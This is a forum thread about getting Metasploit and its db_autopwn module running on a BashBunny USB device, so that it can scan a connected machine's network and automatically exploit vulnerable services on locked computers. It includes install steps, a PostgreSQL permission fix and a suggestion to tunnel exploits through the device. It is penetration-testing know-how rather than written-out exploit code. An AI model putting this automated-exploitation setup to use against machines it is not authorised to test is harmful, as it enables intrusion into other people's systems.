Jump to content
Mohamed A. Baset

Metasploit Framework with db_autopwn module on BashBunny

Recommended Posts

Hi Guys, 
I started this thread to have more discussion about automating similar attacks, in this video i managed (after lots of work and fight) to first get ruby run properly then Metasploit framework installed and running + connected it to Postgresql database + db_autopwn running properly on my BashBunny, scanning the bunny IP range 172.16.64.0/24 with db_nmap, then pass the scan results to metasploit exploitation module and bingo, we can exploit a fully locked devices which running vulnerable OSes/Services.

Warning: The video is super long (you are free to escape some minutes) because of the humble specifications of the BashBunny device (i wish we can get an upgraded BashBunny 2.0 with at least 1 or 2 GB of memory and more faster processor for these kind of heavy stuff)

Any questions i'm ready to answer!

Enjoy watching

https://youtu.be/b6U_t8HPKNk

Share this post


Link to post
Share on other sites
2 hours ago, Mohamed A. Baset said:

Any questions i'm ready to answer!

I had no problems with ruby, but installing metasploit and setting it up with postgresql has been a PITA.

I tried watching the movie but even with my laptop on fullscreen the text is pretty small so cant fully see everything. Do you just run the module in the movie? or are you showing the installation process also? I would be interested in the installation step - especially the postgresql setup. would you show this part in more detail please?

Thank you for your contribution!

Share this post


Link to post
Share on other sites

Sorry my bad, my screen resolution is so high. Yes only running the module not the installation process. But what problems are you facing?

Installing postgresql is super easy, just the normal installation process but after finishing the setup there is a trick to add the "postgres" user to the network group so it will be able to listen on the port and access the socket. (This is the trick that costed me lots of time)

+ i did a lot of "sleep"s to avoid the memory issues because of the limitations on the Bunny.
 

Share this post


Link to post
Share on other sites

I have a suggestion. metasploit I'm sure is painfully slow to run on this device.

(I don't own one)

 

You can turn this device into a reverse proxy and run metasploit from a remote machine and tunnel exploits threw.

 

I have been wanting to write a tutorial on how to do this.

Share this post


Link to post
Share on other sites
1 hour ago, Mohamed A. Baset said:

But what problems are you facing?

I didn't install postgresql as it was already present on the BB, maybe that was the issue, or one of them. I was getting an error when trying to do anything with the postgresql database like it wouldn't connect. I documented my efforts here along with other stuff.

I will look into the postgres user thing like you suggest.

34 minutes ago, i8igmac said:

I have been wanting to write a tutorial on how to do this.

Woo sounds cool. If you would write it I would deffo try it.

Share this post


Link to post
Share on other sites
5 hours ago, i8igmac said:

I have a suggestion. metasploit I'm sure is painfully slow to run on this device.

(I don't own one)

 

You can turn this device into a reverse proxy and run metasploit from a remote machine and tunnel exploits threw.

 

I have been wanting to write a tutorial on how to do this.

I don't know if you are familiar with other Hak5 products or not but LanTurtle would be more reliable in the attack scenario you are describing here!

 

Share this post


Link to post
Share on other sites
5 hours ago, Just_a_User said:

I didn't install postgresql as it was already present on the BB, maybe that was the issue, or one of them. I was getting an error when trying to do anything with the postgresql database like it wouldn't connect. I documented my efforts here along with other stuff.

As i mentioned before this might be a 99% an issue with the user priveleges because "postgres" user is not added to the user groups where it can access network, Try: 

usermod -a -G netdev,systemd-network,net_raw postgres

Then tell me if it works or not + the exact problem if exist!

  • Like 1

Share this post


Link to post
Share on other sites
6 hours ago, Mohamed A. Baset said:

Then tell me if it works or not + the exact problem if exist!

That totally solved my issue! I had given up on a full MSF install but this will allow me to continue. Big thanks!

Share this post


Link to post
Share on other sites
Quote

That totally solved my issue! I had given up on a full MSF install but this will allow me to continue. Big thanks!

 

Glad to hear that, I suffered too to finally figure out the real problem. Now we have lots of attack possibilities, Share with me the good stuff you're thinking about tho :)

I'm planning to release my Metasploit Autopwn bashbunny payload very soon.

Edited by Mohamed A. Baset

Share this post


Link to post
Share on other sites

@Mohamed A. Baset how did you install metasploit to the /tools folder?  I installed manually and used the .deb file from rapid7 neither worked.

Share this post


Link to post
Share on other sites
1 hour ago, b0N3z said:

@Mohamed A. Baset how did you install metasploit to the /tools folder?  I installed manually and used the .deb file from rapid7 neither worked.

1. Installed ruby via "rbenv" (2.4.1 armhf is preferred)
2. Cloned Rapid7's metasploit repo inside /tools/
3. cd to /tools/metasploit-framework/
4. gem install bundler
5. bundle install
7. Bingo!

Edited by Mohamed A. Baset
  • Upvote 1

Share this post


Link to post
Share on other sites
On 9/1/2017 at 6:15 PM, Mohamed A. Baset said:

Hi Guys, 
I started this thread to have more discussion about automating similar attacks, in this video i managed (after lots of work and fight) to first get ruby run properly then Metasploit framework installed and running + connected it to Postgresql database + db_autopwn running properly on my BashBunny, scanning the bunny IP range 172.16.64.0/24 with db_nmap, then pass the scan results to metasploit exploitation module and bingo, we can exploit a fully locked devices which running vulnerable OSes/Services.

Warning: The video is super long (you are free to escape some minutes) because of the humble specifications of the BashBunny device (i wish we can get an upgraded BashBunny 2.0 with at least 1 or 2 GB of memory and more faster processor for these kind of heavy stuff)

Any questions i'm ready to answer!

Enjoy watching

https://youtu.be/b6U_t8HPKNk

Hey, thanks so much for the work on this payload. I'm having issues using metasploit, it tells me my database.yml file is not found. Is there any way I can fix this?

Edited by thatalbinofrog

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...